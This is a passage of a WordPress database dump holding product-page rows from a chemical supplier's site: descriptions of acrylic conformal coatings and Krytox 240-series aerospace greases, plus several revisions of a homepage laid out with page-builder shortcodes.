href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>', 'MS-475C', 'Miller-Stephesons&#039; Acrylic Conformal Coating offers superior toughness and abrasion resistance, excellent dielectric properties, fungal resistance, and moisture and environmental protection. Our formulation is 100% non-flammable. The acrylic resin meets the requirements of MIL-I-46058C Type AR. Printed circuit boards covered with acrylic coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. MS-475C will cover 6.4 sq. ft. at a 2 mil. thickness per 1- aerosol can.\n\n&nbsp;', 'inherit', 'closed', 'closed', '', '621-autosave-v1', '', '', '2016-10-11 13:42:05', '2016-10-11 13:42:05', '', 621, 'https://132.148.10.86/wordpress/621-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (637, 3, '2016-08-22 12:43:22', '2016-08-22 12:43:22', 'Miller-Stepheson Acrylic Conformal Coating MIL-SPEC MS-477C offer superior toughness and abrasion resistance, excellent dielectric properties, fungal resistance, and moisture and environmental protection. Our formulation is 100% non-flammable. The acrylic resin meets the requirements of MIL-I-46058C Type AR. Printed circuit boards covered with acrylic coatings are repairable.  Simply heat the coating with a soldering iron to remove the components.\r\n\r\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. Printed circuit boards covered with acrylic conformal coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. Drying and curing of acrylic coating depends upon evaporation of the solvent.  Air dry coated boards for 30 minutes at 77°F/25°C to remove solvents before curing in oven or applying additional coats. The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.\r\n\r\nMS-477C Acrylic Conformal Coating MIL-SPEC are probably the easiest coating to remove and repair. The coating can be removed completely or locally by using specifically designed stripping chemistries. The board can then be re-coated completely of just in area of the repair. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>', 'MS-477C', 'Miller-Stephesons’ Acrylic Conformal Coating offers superior toughness and abrasion resistance, excellent dielectric properties, fungal resistance, and moisture and environmental protection. Our formulation is 100% non-flammable. The acrylic resin meets the requirements of MIL-I-46058C Type AR. Printed circuit boards covered with acrylic coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. MS-477C, the bulk liquid version will cover 91 sq. ft. per gallon at a 2 mil. thickness when applied via dip, brush, or spray\r\n\r\n&nbsp;', 'publish', 'open', 'closed', '', 'acrylic-conformal-coating-mil-spec', '', '', '2016-11-24 03:39:17', '2016-11-24 03:39:17', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=637', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (638, 2, '2016-08-22 13:00:41', '2016-08-22 13:00:41', 'Krytox 240AZ grease is based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 149ºC and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are non-flammable and are safe for use in oxygen service. Krytox oils and greases are silicone free and do not damage plastics or elastomers or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as solving many other routine lubrication problems. Krytox greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written. This is the latest data from the recertification that is required every five years. Krytox greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n\r\nApplications for Krytox 240AZ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox 240AZ grease is applied in various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from -57 to 149ºC. In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-aviation/">Click here to learn more about Aviation applications.</a>\r\n<a href="https://www.miller-stephenson.com/krytox-agl-683-gearbox-grease/">Click here to learn more about Aviation Gear Box Grease</a>\r\n\r\nKrytox™ is a trademark of the Chemours Company FC, LLC.', 'Krytox 240AZ', 'Krytox 240 AZ is a <strong>MIL PRF-27617 TYPE I</strong> grease. It also has NSF H-1 rating for incidental food contact. If Krytox 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification. Krytox 240AZ is the lowest viscosity grease of the 240 series greases. Ideal for applications that require a very low viscosity grease. Temperature is -57 to 149°C. \r\n<br><br/>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-240az', '', '', '2017-08-18 17:31:08', '2017-08-18 17:31:08', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=638', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (639, 1, '2016-08-22 16:31:33', '2016-08-22 16:31:33', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY&amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZORADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-22 16:31:33', '2016-08-22 16:31:33', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (640, 1, '2016-08-22 16:33:39', '2016-08-22 16:33:39', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6" animate="flipInY"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY&amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZORADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-22 16:33:39', '2016-08-22 16:33:39', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (641, 1, '2016-08-22 16:37:16', '2016-08-22 16:37:16', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY&amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZORADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-22 16:37:16', '2016-08-22 16:37:16', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (642, 2, '2016-08-22 17:41:50', '2016-08-22 17:41:50', '<h2>Krytox 240AA High-Performance Aerospace &amp; Aviation Grease</h2>\r\nApplications for Krytox 240AA lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox 240AA grease is applied in various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\r\n\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high-speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden and can create debris which will contaminate the grease.\r\n\r\nKrytox™ is a trademark of the Chemours Company FC, LLC.', 'Krytox 240AA', 'Krytox 240AA grease is the second least viscous grease in the Krytox 240 Series. The only grease less viscous is the Krytox 240AZ. 240AA has a viscosity of 60 cSt at 20°C and 24.7 cSt at 38°C it is ideal for low viscosity grease applications. Ideal temperature range of Krytox 240AA is -51 to 177°C.\r\n<br><br/>\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-240aa', '', '', '2017-08-18 17:20:41', '2017-08-18 17:20:41', '', 0, 'https://132.148.10.86/wordpress/product/240aa/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (643, 2, '2016-08-22 17:42:28', '2016-08-22 17:42:28', '<h2>Krytox 240 AB - Military Spec Aerospace &amp; Aviation Greases</h2>\r\n<h3>MIL PRF-26717 TYPE II &amp; NSF H-1 RATED</h3>\r\nKrytox 240AB grease is based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are non-flammable and are safe for use in oxygen service. Krytox oils and greases are silicone free and do not damage plastics or elastomers or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as solving many other routine lubrication problems. Krytox greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written. This is the latest data from the recertification that is required every five years. Krytox greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n\r\nApplications for Krytox 240AB lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox 240AB grease is applied on various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\r\n\r\nKrytox™ is a trademark of the Chemours Company FC, LLC.', 'Krytox 240AB', 'Krytox 240AB is a <strong>MIL PRF-27617 TYPE II</strong> greases. It is also NSF H-1 Rated for incidental food contact. Viscosity @ 20°C is 240 cSt and Viscosity @ 38°C is 86 cSt. The 240AB is ideal in -40 to 232°C environments. \r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-240ab', '', '', '2017-08-18 17:38:45', '2017-08-18 17:38:45', '', 0, 'https://132.148.10.86/wordpress/product/240ab/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (644, 2, '2016-08-22 17:42:47', '2016-08-22 17:42:47', '<h2>Krytox 240AC Aerospace and Aviation Grease</h2>\r\n<h3>High Performance PFPE Lubricant; Unmatched Performance; MIL-SPEC PRF-27617 Type III</h3>\r\nKrytox 240AC grease is based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox oils and greases are silicone free and do not damage plastics or elastomers or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as solving many other routine lubrication problems. Krytox greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written. This is the latest data from the re-certification that is required every five years. Krytox greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n\r\nApplications for Krytox 240AC lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\r\n<h3>Krytox™ 240AC - Superior Performance, Temperature Stability, and Reduction in Wear</h3>\r\nIn the aerospace industry, Krytox 240AC grease is applied on various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\r\n\r\nKrytox™ is a trademark of the Chemours Company FC, LLC.', 'Krytox 240AC', 'Krytox 240AC is a <strong>MIL PRF-26717 TYPE III</strong> and NSF H-1 Rated grease. It also meets many ASTM specifications. Krytox 240AC has a viscosity of 800 at 20°C and 270 cSt at 38°C making it ideal in situations where a high viscosity grease is required. The ideal temperature of this grease is -34 to 288°C. \r\n<br><br/>\r\n<img class="alignright" 